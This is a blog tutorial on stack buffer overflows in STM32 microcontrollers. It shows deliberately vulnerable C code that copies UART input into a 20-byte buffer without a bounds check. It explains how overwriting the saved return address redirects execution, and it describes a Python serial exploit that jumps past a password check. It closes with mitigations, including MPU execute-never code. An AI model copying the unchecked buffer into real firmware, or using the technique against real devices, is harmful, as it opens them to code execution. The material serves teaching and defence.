Stack Buffer Overflow in STM32

Stack Buffer Overflow in STM32

26 September 2018
Embedded, AppSec

Nucleo64 STM32446RE
Nucleo64 STM32446RE

Modern microcontrollers are similar to 10–20-year-old computers not only by computing power but also by their vulnerabilities.

Next, we’ll talk about the almost forgotten class of vulnerabilities, which stop being purely academic and transition to a new wave of popularity.


0x00 Buffer overflow #

As an example dummy, we take the following code, which awaits the user’s password and decides whether to grant access.

Smash this for fun and profit
void callme() {
	HAL_UART_Transmit(&huart2, sWelcome, strlen(sWelcome), 100);

	while (1) { // just keep led blinking
		HAL_GPIO_TogglePin(LD2_GPIO_Port, LD2_Pin); 
		HAL_Delay(100);
	}
}
	
void CheckUART() {
	uint8_t byte;
	int offset = 0;
	char buffer[20] = { 0 };

	while (1) {
		if (HAL_UART_Receive(&huart2, &byte, 1, 0) == HAL_OK) {
			if (byte == '\r' || byte == '\n') {
				buffer[offset] = 0; // null terminated string
				if (strcmp(sPassword, buffer) == 0) {
					DeviceLocked = 0;
				}
				offset = 0;
				return;
			} else {
				buffer[offset] = byte;
				offset++;
			}
		}
	}
}

int main(void) {
	HAL_Init();
	SystemClock_Config();
	MX_GPIO_Init();
	MX_USART2_UART_Init();

	char buffer[30] = { 0 };
	sprintf(buffer, "callme() pointer: 0x%08x \r\n", callme); // so you dont need reverse firmware for now
	HAL_UART_Transmit(&huart2, buffer, strlen(buffer), 100);
	
	while (1) {
		CheckUART();
		if (!DeviceLocked) {
			callme();
		}
		HAL_Delay(100);
	}
}

In the lines 38–40 of the main() function, a pointer to the callme() function is output, which is the function we want to call.

There’s a vulnerability in the CheckUART function, which takes the password. The end of the input is determined by the \ r or \ n (pressed Enter).

The main problem is that the byte stream may exceed the buffer size. Where will those extra bytes be written?

0x01 Memory Map #

Reference Manual STM32F446
Reference Manual STM32F446

The RAM of STM32 starts with the address 0x2000 0000. Part of it is occupied by different constants and global/static variables. Next up are the parts for the stack and heap.

Stack goes down
Stack goes down

The stack is not only a software concept. Inside the MCU core, there is a dedicated register which holds the pointer to the current stack frame - stack pointer (sp).

ARM Registers
ARM Registers

When the function is called the following information is stored on the stack:

  • a pointer from where the function is called. This information is available in the link register (lr),
  • contents of some general use registers,
  • a place for local variables storage.

When we allocate a place on the stack for all of the above (we create a new frame), we decrement sp (grows downward, from larger addresses to smaller ones) the required number of bytes. At the end of the function, we return the same number of bytes by incrementing sp and then restore the old values ​​back to the registers.

Saved lr register value is then written to the pc (program counter) — a register indicating the next instruction to be executed. In other words, by overwriting the value of the lr register stored on the stack, we can direct the execution of the program at the end of the function at our own discretion.

0x02 Assembler #

Consider this in the CheckUART example, listed below. The ways to obtain code we discussed in our previous article about reverse engineering stm32 firmware

Assembly listing for CheckUART
Assembly listing for CheckUART

The mechanism described above looks like this (function body was removed from the image):

Stack frame allocation and destruction
Stack frame allocation and destruction

ARM has instructions that save register values on the stack in one clock cycle and load them back (push and pop respectively).

  • Allocation of stack frame — sub sp, 0x18.
  • Freeing space — add sp, 0x18

0x03 Exploit #

As a device, we will take Nucleo64 based on the STM32F446RE MCU. UART2 via the debug probe sends the information to the character device COMx or /dev/tty.*. Chip waits for password pass123, then congratulates the user and starts flashing LED happily.

Having the function pointer will simplify the task :)
Having the function pointer will simplify the task :)

We do not know the password, but we just learned the mechanism of rewriting the return address to the stack. We will try to send more than 20 bytes to the buffer. Experimentally we figured that for this code and the Os level of optimization the required number is 32 bytes, followed by 4 more bytes being the address that we want to be executed by the program. Let’s make it execute callme() (0x08001435). This task can be easily written in Python using serial and struct packages. The source code of exploit is listed below:

The delay between byte writes is necessary for reliable transmission
The delay between byte writes is necessary for reliable transmission

Launch the script, press reset on the board and a second later we enjoy the flashing of the LED without entering a password:

izi gg wp
izi gg wp

At the same time, in the real world
At the same time, in the real world

0x04 What have I done #

what have i done
¯\(ツ)

During the development, there is a need to store and combine information. Interfaces, for the most part, transmit raw bytes, and the application layer needs aggregation and bytes processing in the form of packages. Errors during array boundary checks can be turned into Remote Code Execution (RCE) or Arbitrary Code Execution that neutralize attempts to protect the device and its information.

Filling the buffer not with garbage (like 32 x “.”), but instructions and then passing them execution flow — one can execute his own code (shellcode).

0x05 Empire Strikes Back #

There are the following protection mechanisms:

  • ASLR — each time the code is executed, the function and stack addresses are different. Implementation requires a full-fledged OS and MMU. It is actively used on all desktop and server systems. The technology is not available on most routers and other built-in devices from the GNU / Linux operating system
  • Stack Canary — most of nowadays toolchains have flags that allow them to generate special values ​​on the stack that are checked on the function exit. If the value has been overwritten, the execution will go into the corresponding event handler function. For GCC, it is a -fstack-protector. Obviously, the static unchanged value can be easily noticed and be included in the shellcode to prevent the mechanism from triggering.
  • XN (eXecute Never) — the technology allows you to mark areas of memory that can not contain executable instructions. It uses the MPU peripheral of the microcontroller. For the STM32F446, the initialization code will be as follows:
void MPU_Init() {
	MPU_Region_InitTypeDef MPU_InitStruct;

	HAL_MPU_Disable();

	MPU_InitStruct.Enable = MPU_REGION_ENABLE;
	MPU_InitStruct.BaseAddress = 0x20000000;
	MPU_InitStruct.Size = MPU_REGION_SIZE_8MB;
	MPU_InitStruct.DisableExec = MPU_INSTRUCTION_ACCESS_DISABLE;
	HAL_MPU_ConfigRegion(&MPU_InitStruct);

	HAL_MPU_Enable(MPU_PRIVILEGED_DEFAULT);
}

0x06 DYI #

Try writing your own shellcode and execute it after placing it into the buffer. Then repeat this with the MPU enabled.

0x07 Moar? #


We write about such stuff on TechMaker Facebook page and teach it at Courses